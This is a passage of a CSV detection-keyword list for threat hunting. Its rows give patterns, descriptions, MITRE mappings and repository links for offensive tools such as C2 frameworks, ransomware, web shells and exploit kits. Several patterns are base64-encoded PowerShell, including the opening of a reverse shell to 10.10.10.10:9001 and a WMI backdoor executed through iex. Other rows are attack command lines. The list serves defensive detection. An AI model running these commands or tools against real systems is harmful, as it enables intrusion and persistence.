"*JAB4ACAAPQAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AUABJAEQAIAAkAHAAaQBkACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAG4AYQBtAGUAOwAgACIAJABwAGkAZAAgACQAeAAuAGUAeABlACIA*",".{0,1000}JAB4ACAAPQAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AUABJAEQAIAAkAHAAaQBkACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAG4AYQBtAGUAOwAgACIAJABwAGkAZAAgACQAeAAuAGUAeABlACIA.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","49990"
"*JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMQAwACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBu*",".{0,1000}JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMQAwACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBu.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#base64","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","49991"
"*JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA*",".{0,1000}JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","49992"
"*JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBDAEYAVABUAEwAVgBrAEMALwB6AEUAMABPAFQAWQB*",".{0,1000}JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBDAEYAVABUAEwAVgBrAEMALwB6AEUAMABPAFQAWQB.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","#base64","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","49993"
"*jackdaw --*",".{0,1000}jackdaw\s\-\-.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","N/A","N/A","N/A","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","49994"
"*jackdaw.py*",".{0,1000}jackdaw\.py.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","N/A","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","49995"
"*jackit --reset --debug*",".{0,1000}jackit\s\-\-reset\s\-\-debug.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","49996"
"*jackson5sec/ShimDB*",".{0,1000}jackson5sec\/ShimDB.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","1","N/A","N/A","9","1","37","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z","49997"
"*jaeles scan -s bigip-cve-2020-5902.yaml -U https_url.txt*",".{0,1000}jaeles\sscan\s\-s\sbigip\-cve\-2020\-5902\.yaml\s\-U\shttps_url\.txt.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","49998"
"*jakobfriedl/precompiled-binaries*",".{0,1000}jakobfriedl\/precompiled\-binaries.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50000"
"*jakoby.lol/fbi*",".{0,1000}jakoby\.lol\/fbi.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","1","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","50001"
"*janoglezcampos/rust_syscalls*",".{0,1000}janoglezcampos\/rust_syscalls.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","50002"
"*jaredhaight/PSAttackBuildTool*",".{0,1000}jaredhaight\/PSAttackBuildTool.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","50003"
"*jas502n/bypassAV*",".{0,1000}jas502n\/bypassAV.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","N/A","10","10","17","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z","50004"
"*jas502n/CVE-2020-5902*",".{0,1000}jas502n\/CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","N/A","4","373","111","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z","50005"
"*Jasmin Decryptor.csproj*",".{0,1000}Jasmin\sDecryptor\.csproj.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50006"
"*Jasmin Decryptor.exe*",".{0,1000}Jasmin\sDecryptor\.exe.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50007"
"*Jasmin Decryptor.pdb*",".{0,1000}Jasmin\sDecryptor\.pdb.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50008"
"*Jasmin Decryptor.sln*",".{0,1000}Jasmin\sDecryptor\.sln.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50009"
"*Jasmin Encryptor.csproj*",".{0,1000}Jasmin\sEncryptor\.csproj.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50010"
"*Jasmin Encryptor.exe*",".{0,1000}Jasmin\sEncryptor\.exe.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50011"
"*Jasmin Encryptor.sln*",".{0,1000}Jasmin\sEncryptor\.sln.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50012"
"*Jasmin Encryptor\bin\Release*",".{0,1000}Jasmin\sEncryptor\\bin\\Release.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50013"
"*Jasmin Ransomware C2 Checkin*",".{0,1000}Jasmin\sRansomware\sC2\sCheckin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50014"
"*Jasmin%20Decryptor.exe*",".{0,1000}Jasmin\%20Decryptor\.exe.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50015"
"*Jasmin%20Decryptor.pdb*",".{0,1000}Jasmin\%20Decryptor\.pdb.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50016"
"*Jasmin%20Encryptor.exe*",".{0,1000}Jasmin\%20Encryptor\.exe.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50017"
"*Jasmin_Decryptor.mainform*",".{0,1000}Jasmin_Decryptor\.mainform.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50018"
"*Jasmin_Decryptor.Properties*",".{0,1000}Jasmin_Decryptor\.Properties.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50019"
"*'jasminadmin'@'localhost'*",".{0,1000}\'jasminadmin\'\@\'localhost\'.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50020"
"*jasmin-ransomware-master*",".{0,1000}jasmin\-ransomware\-master.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","50021"
"*jasonxtn/Argus*",".{0,1000}jasonxtn\/Argus.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","1","N/A","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","50022"
"*jatayu.php*",".{0,1000}jatayu\.php.{0,1000}","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","C2","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","N/A","10","33","9","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z","50023"
"*jatayu-image.png*",".{0,1000}jatayu\-image\.png.{0,1000}","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","C2","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","N/A","10","33","9","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z","50024"
"*java -jar BeaconTool.jar*",".{0,1000}java\s\-jar\sBeaconTool\.jar.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","50025"
"*java -jar BeaconTool.jar*",".{0,1000}java\s\-jar\sBeaconTool\.jar.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","50026"
"*java -jar chunk-Proxy.jar java 1088 http://10.10.10.1:8080/proxy.jsp*",".{0,1000}java\s\-jar\schunk\-Proxy\.jar\sjava\s1088\shttp\:\/\/10\.10\.10\.1\:8080\/proxy\.jsp.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","0","#content","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","50027"
"*java -jar sAINT.jar*",".{0,1000}java\s\-jar\ssAINT\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","50028"
"*java -jar sAINT.jar*",".{0,1000}java\s\-jar\ssAINT\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","50029"
"*java/jndi/LDAPRefServer.java*",".{0,1000}java\/jndi\/LDAPRefServer\.java.{0,1000}","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tool","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","N/A","10","2682","733","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z","50030"
"*java/jsp_shell_reverse_tcp*",".{0,1000}java\/jsp_shell_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","50031"
"*java/shell_reverse_tcp*",".{0,1000}java\/shell_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","50032"
"*java-deserialization-exploits*",".{0,1000}java\-deserialization\-exploits.{0,1000}","offensive_tool_keyword","java-deserialization-exploits","A collection of curated Java Deserialization Exploits","T1029 - T1529 - T1569 - T1218","TA0003 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Coalfire-Research/java-deserialization-exploits","1","0","N/A","N/A","N/A","6","593","219","2021-05-16T23:10:49Z","2016-05-31T16:23:08Z","50033"
"*javascript-obfuscator*",".{0,1000}javascript\-obfuscator.{0,1000}","offensive_tool_keyword","javascript-obfuscator","JavaScript Obfuscator is a powerful free obfuscator for JavaScript. containing a variety of features which provide protection for your source code.","T1027","TA0010","N/A","N/A","Defense Evasion","https://github.com/javascript-obfuscator/javascript-obfuscator","1","0","N/A","N/A","N/A","10","14658","1602","2024-07-01T21:42:13Z","2016-05-09T08:16:53Z","50034"
"*java-socks-proxy-server.jar*",".{0,1000}java\-socks\-proxy\-server\.jar.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","1","N/A","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","50035"
